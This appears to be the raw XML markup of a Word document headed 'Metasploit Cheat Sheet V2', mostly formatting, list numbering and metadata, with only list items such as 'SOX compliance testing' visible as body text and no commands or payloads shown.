    <w:p w14:paraId="5D959091" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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E6E9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SOX compliance testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7FDEA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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6E6E99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Industry-specific regulations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17731FE0" w14:textId="77777777" w:rsidR="00160BE7" w:rsidRPr="00851954" w:rsidRDefault="00160BE7" w:rsidP="00851954">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00160BE7" w:rsidRPr="00851954" w:rsidSect="002F2870">
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/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37B6E" w14:textId="77777777" w:rsidR="00FC09E2" w:rsidRDefault="00FC09E2" w:rsidP="005938DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C5FFE08" w14:textId="77777777" w:rsidR="00FC09E2" w:rsidRDefault="00FC09E2" w:rsidP="00593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F7E74" w14:textId="77777777" w:rsidR="005938DE" w:rsidRDefault="005938DE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E9CEE57" w14:textId="77777777" w:rsidR="005938DE" w:rsidRDefault="005938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33A4A" w14:textId="77777777" w:rsidR="00FC09E2" w:rsidRDefault="00FC09E2" w:rsidP="005938DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AA1558C" w14:textId="77777777" w:rsidR="00FC09E2" w:rsidRDefault="00FC09E2" w:rsidP="00593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6245F" w14:textId="1AEAFBBF" w:rsidR="005938DE" w:rsidRDefault="005938DE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Metasploit Cheat Sheet V2</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3465CB16" w14:textId="77777777" w:rsidR="005938DE" w:rsidRDefault="005938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6F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91B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7F89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AD6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432E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E14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E6417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="027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16BCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77E0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83063"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA1A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438CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="231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0254A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E7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7348A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E1C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61312"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9754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B33EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB4C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965677"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB82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8D4574"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BA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A6870"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9DEA8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BB66712"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA8CD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02FD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="422A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70896"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37007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2FF61C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0096C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340F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D38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81989"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEE4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6600C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04DC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CD2DA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B18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17313"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0801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EB3CD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F458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5D0A1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80CC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C7A76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="938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042BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEB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F01E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578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02332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D58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645F73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFB0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13560E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50B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6E084F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D75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2C46BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D2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B7F8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C620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C577D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DFCD7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184A13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C2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D1359A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="381A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C2E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23BE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A321EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA56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E70484"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4948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65815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03954885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32559746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90351431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6274218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71018157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48689730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38345659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920136229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15364189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728143202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987708118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601522582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317800300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877547574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692106698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690032827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5584904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14812778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41100467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708406755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292439136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692997903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761298326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764649443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915819847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816460939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768848619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51461208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55589818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00181328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43694303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064714548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132937616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8314356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93745792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2084984233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052197826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994069031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646199248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374887054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159324576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 w16cid:durableId="99807607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152242787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2118669344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193974844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313948909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603851341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848715553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 w16cid:durableId="2014794374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 w16cid:durableId="1964648703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1284581389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 w16cid:durableId="136020582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" w16cid:durableId="1013141739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1889300210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247662259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 w16cid:durableId="1128158205">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="465705435">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="114057542">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1530726984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2013953252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1356617657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485320675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" w16cid:durableId="136146264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" w16cid:durableId="699747277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289897257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" w16cid:durableId="1496452485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" w16cid:durableId="2094079860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" w16cid:durableId="1604650715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" w16cid:durableId="1039746870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" w16cid:durableId="491456545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" w16cid:durableId="1431707095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3" w16cid:durableId="1073162896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" w16cid:durableId="1192113345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" w16cid:durableId="1267739145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6" w16cid:durableId="1031608836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7" w16cid:durableId="1320425268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8" w16cid:durableId="845747513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9" w16cid:durableId="1241065950">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="1375079434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1" w16cid:durableId="415129804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2" w16cid:durableId="1812283783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3" w16cid:durableId="797913052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4" w16cid:durableId="283660588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5" w16cid:durableId="225261121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6" w16cid:durableId="1288045180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7" w16cid:durableId="322779215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8" w16cid:durableId="1548102031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26797742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0" w16cid:durableId="54035963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21142994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2" w16cid:durableId="70926118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3" w16cid:durableId="102250888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4" w16cid:durableId="364991409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5" w16cid:durableId="1681664495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6" w16cid:durableId="1644384042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7" w16cid:durableId="817723302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8" w16cid:durableId="990788203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9" w16cid:durableId="126795683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0" w16cid:durableId="88526066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1" w16cid:durableId="10971027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2" w16cid:durableId="23936940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3" w16cid:durableId="288434808">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="104" w16cid:durableId="133911166">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="105" w16cid:durableId="714504274">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="106" w16cid:durableId="450393213">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="107" w16cid:durableId="2025398602">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="108" w16cid:durableId="723796363">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="12240259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70"/>
    <w:rsid w:val="00160BE7"/>
    <w:rsid w:val="002F2870"/>
    <w:rsid w:val="003B23D0"/>
    <w:rsid w:val="003C038E"/>
    <w:rsid w:val="00423E48"/>
    <w:rsid w:val="0056348E"/>
    <w:rsid w:val="005938DE"/>
    <w:rsid w:val="006E6E99"/>
    <w:rsid w:val="00750AA2"/>
    <w:rsid w:val="00821833"/>
    <w:rsid w:val="00851954"/>
    <w:rsid w:val="0087055C"/>
    <w:rsid w:val="00B51A2C"/>
    <w:rsid w:val="00BC7963"/>
    <w:rsid w:val="00DE4A6E"/>
    <w:rsid w:val="00E14A2C"/>
    <w:rsid w:val="00E32884"/>
    <w:rsid w:val="00E80C96"/>
    <w:rsid w:val="00FC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EDC3D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E932F3F5-0AFF-4A45-A692-3EE3581A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s">
    <w:name w:val="Code Snippets"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeSnippetsChar"/>
    <w:qFormat/>
    <w:rsid w:val="00423E48"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="288"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeSnippetsChar">
    <w:name w:val="Code Snippets Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeSnippets"/>
    <w:rsid w:val="00423E48"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F2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8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8DE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005938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Pascoe</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bill Pascoe</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-20T09:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-20T09:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>